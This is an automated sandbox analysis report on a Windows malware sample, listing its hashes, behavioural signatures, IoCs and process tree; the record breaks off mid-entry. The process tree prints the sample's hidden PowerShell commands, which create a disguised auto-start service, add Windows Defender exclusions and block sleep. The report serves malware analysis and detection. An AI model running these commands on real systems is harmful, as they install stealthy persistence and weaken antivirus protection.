f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
24-06-2024 06:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
Size

38.8MB
MD5

de78f05822b58389a08df867280df451
SHA1

d27954678d26afb60dd51750f69520a79bf8b997
SHA256

f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1
SHA512

8374e56d7d3e8ced16e15cd8c34e7059feacb94964b4a50c22cbf6d3045f2c52119d0393f218d0d4b445afa6ce12f607c85b09b82859275d81ebc91880ebe5d2
SSDEEP

786432:DCyIg99ycT/7t7OB2K4oX5Znw0e7s0sjgTTb2:DCxg99yaTt7G2K4opd3e7s0sjy

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1056	powershell.exe
4000	powershell.exe
3656	powershell.exe
3148	powershell.exe
4140	powershell.exe
1056	powershell.exe
4664	powershell.exe
4592	powershell.exe
4612	powershell.exe
3592	powershell.exe
4000	powershell.exe
2128	powershell.exe
1700	powershell.exe
4220	powershell.exe
1404	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Executes dropped EXE 5 IoCs

Processes:

f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exewinsvc.exewinsvc.exeWINCFG.EXEWINNET.EXE

pid process

1936 f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
1528 winsvc.exe
116 winsvc.exe
3384 WINCFG.EXE
1284 WINNET.EXE
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4112 powercfg.exe
2276 powercfg.exe
2344 powercfg.exe
3464 powercfg.exe
1272 powercfg.exe

pid	process
1936	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
1528	winsvc.exe
116	winsvc.exe
3384	WINCFG.EXE
1284	WINNET.EXE

pid	process
4112	powercfg.exe
2276	powercfg.exe
2344	powercfg.exe
3464	powercfg.exe
1272	powercfg.exe

Drops file in System32 directory 21 IoCs

Processes:

powershell.exepowershell.exeWINNET.EXEf589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exepowershell.exepowershell.exepowershell.exepowershell.exewinsvc.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\router.keys	WINNET.EXE
File opened for modification	C:\Windows\system32\.coD8FB.tmp	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
File opened for modification	C:\Windows\system32\winsvc.exe	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\ntcp2.keys	WINNET.EXE
File created	C:\Windows\system32\data\ssu2.keys	WINNET.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\wincfg.exe	winsvc.exe
File opened for modification	C:\Windows\system32\winnet.exe	winsvc.exe
File opened for modification	C:\Windows\system32\data\router.info	WINNET.EXE
File created	C:\Windows\system32\data\router.info	WINNET.EXE
File created	C:\Windows\system32\data\destinations\i26lrumvpkfjjzwxnfzz5to5py322milb3hcw2om5h3rn574reqa.dat	WINNET.EXE
File opened for modification	C:\Windows\System32\.coD8FB.tmp	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1108 sc.exe
4732 sc.exe
3300 sc.exe
2984 sc.exe

pid	process
1108	sc.exe
4732	sc.exe
3300	sc.exe
2984	sc.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

Processes:

resource	yara_rule
C:\Windows\System32\winnet.exe	embeds_openssl

Kills process with taskkill 12 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
872	taskkill.exe
2904	taskkill.exe
4244	taskkill.exe
1404	taskkill.exe
1996	taskkill.exe
664	taskkill.exe
1128	taskkill.exe
3064	taskkill.exe
1872	taskkill.exe
4656	taskkill.exe
2496	taskkill.exe
2544	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewinsvc.exe

pid	process
4140	powershell.exe
4140	powershell.exe
3592	powershell.exe
3592	powershell.exe
3656	powershell.exe
3656	powershell.exe
2128	powershell.exe
2128	powershell.exe
1056	powershell.exe
1056	powershell.exe
4000	powershell.exe
4000	powershell.exe
4664	powershell.exe
4664	powershell.exe
4592	powershell.exe
4592	powershell.exe
1700	powershell.exe
1700	powershell.exe
4220	powershell.exe
4220	powershell.exe
4612	powershell.exe
4612	powershell.exe
3148	powershell.exe
3148	powershell.exe
1404	powershell.exe
1404	powershell.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe
116	winsvc.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeShutdownPrivilege	4112	powercfg.exe
Token: SeCreatePagefilePrivilege	4112	powercfg.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeShutdownPrivilege	2276	powercfg.exe
Token: SeCreatePagefilePrivilege	2276	powercfg.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeShutdownPrivilege	2344	powercfg.exe
Token: SeCreatePagefilePrivilege	2344	powercfg.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeShutdownPrivilege	3464	powercfg.exe
Token: SeCreatePagefilePrivilege	3464	powercfg.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeShutdownPrivilege	1272	powercfg.exe
Token: SeCreatePagefilePrivilege	1272	powercfg.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	4656	taskkill.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3148	powershell.exe
Token: SeIncreaseQuotaPrivilege	3148	powershell.exe
Token: SeSecurityPrivilege	3148	powershell.exe
Token: SeTakeOwnershipPrivilege	3148	powershell.exe
Token: SeLoadDriverPrivilege	3148	powershell.exe
Token: SeSystemtimePrivilege	3148	powershell.exe
Token: SeBackupPrivilege	3148	powershell.exe
Token: SeRestorePrivilege	3148	powershell.exe
Token: SeShutdownPrivilege	3148	powershell.exe
Token: SeSystemEnvironmentPrivilege	3148	powershell.exe
Token: SeUndockPrivilege	3148	powershell.exe
Token: SeManageVolumePrivilege	3148	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1404	powershell.exe
Token: SeIncreaseQuotaPrivilege	1404	powershell.exe
Token: SeSecurityPrivilege	1404	powershell.exe
Token: SeTakeOwnershipPrivilege	1404	powershell.exe
Token: SeLoadDriverPrivilege	1404	powershell.exe
Token: SeSystemtimePrivilege	1404	powershell.exe
Token: SeBackupPrivilege	1404	powershell.exe
Token: SeRestorePrivilege	1404	powershell.exe
Token: SeShutdownPrivilege	1404	powershell.exe
Token: SeSystemEnvironmentPrivilege	1404	powershell.exe
Token: SeUndockPrivilege	1404	powershell.exe
Token: SeManageVolumePrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1128	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeDebugPrivilege	4244	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exef589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exewinsvc.exepowershell.exepowershell.exepowershell.exepowershell.exewinsvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4080 wrote to memory of 1936	4080	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
PID 4080 wrote to memory of 1936	4080	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
PID 1936 wrote to memory of 1528	1936	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe	winsvc.exe
PID 1936 wrote to memory of 1528	1936	f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe	winsvc.exe
PID 1528 wrote to memory of 4140	1528	winsvc.exe	powershell.exe
PID 1528 wrote to memory of 4140	1528	winsvc.exe	powershell.exe
PID 4140 wrote to memory of 2984	4140	powershell.exe	sc.exe
PID 4140 wrote to memory of 2984	4140	powershell.exe	sc.exe
PID 1528 wrote to memory of 3592	1528	winsvc.exe	powershell.exe
PID 1528 wrote to memory of 3592	1528	winsvc.exe	powershell.exe
PID 3592 wrote to memory of 1108	3592	powershell.exe	sc.exe
PID 3592 wrote to memory of 1108	3592	powershell.exe	sc.exe
PID 1528 wrote to memory of 3656	1528	winsvc.exe	powershell.exe
PID 1528 wrote to memory of 3656	1528	winsvc.exe	powershell.exe
PID 3656 wrote to memory of 4732	3656	powershell.exe	sc.exe
PID 3656 wrote to memory of 4732	3656	powershell.exe	sc.exe
PID 1528 wrote to memory of 2128	1528	winsvc.exe	powershell.exe
PID 1528 wrote to memory of 2128	1528	winsvc.exe	powershell.exe
PID 2128 wrote to memory of 3300	2128	powershell.exe	sc.exe
PID 2128 wrote to memory of 3300	2128	powershell.exe	sc.exe
PID 116 wrote to memory of 1056	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 1056	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4000	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4000	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4664	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4664	116	winsvc.exe	powershell.exe
PID 4664 wrote to memory of 4112	4664	powershell.exe	powercfg.exe
PID 4664 wrote to memory of 4112	4664	powershell.exe	powercfg.exe
PID 116 wrote to memory of 4592	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4592	116	winsvc.exe	powershell.exe
PID 4592 wrote to memory of 2276	4592	powershell.exe	powercfg.exe
PID 4592 wrote to memory of 2276	4592	powershell.exe	powercfg.exe
PID 116 wrote to memory of 1700	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 1700	116	winsvc.exe	powershell.exe
PID 1700 wrote to memory of 2344	1700	powershell.exe	powercfg.exe
PID 1700 wrote to memory of 2344	1700	powershell.exe	powercfg.exe
PID 116 wrote to memory of 4220	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4220	116	winsvc.exe	powershell.exe
PID 4220 wrote to memory of 3464	4220	powershell.exe	powercfg.exe
PID 4220 wrote to memory of 3464	4220	powershell.exe	powercfg.exe
PID 116 wrote to memory of 4612	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 4612	116	winsvc.exe	powershell.exe
PID 4612 wrote to memory of 1272	4612	powershell.exe	powercfg.exe
PID 4612 wrote to memory of 1272	4612	powershell.exe	powercfg.exe
PID 116 wrote to memory of 1872	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 1872	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 1996	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 1996	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 4656	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 4656	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 664	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 664	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 3148	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 3148	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 1404	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 1404	116	winsvc.exe	powershell.exe
PID 116 wrote to memory of 1128	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 1128	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 2496	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 2496	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 2544	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 2544	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 3064	116	winsvc.exe	taskkill.exe
PID 116 wrote to memory of 3064	116	winsvc.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
"C:\Users\Admin\AppData\Local\Temp\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Users\Admin\AppData\Local\Temp\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1-1aebd3c2333a05cb\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
"C:\Users\Admin\AppData\Local\Temp\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1-1aebd3c2333a05cb\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\system32\winsvc.exe
"C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1-1aebd3c2333a05cb\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4140

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
5⤵
- Launches sc.exe
PID:2984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
5⤵
- Launches sc.exe
PID:1108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3656

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
5⤵
- Launches sc.exe
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" start winsvc
5⤵
- Launches sc.exe
PID:3300

C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
